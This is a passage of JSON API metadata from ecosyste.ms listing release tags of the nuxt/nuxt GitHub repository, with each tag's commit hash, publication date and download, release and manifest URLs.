at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosy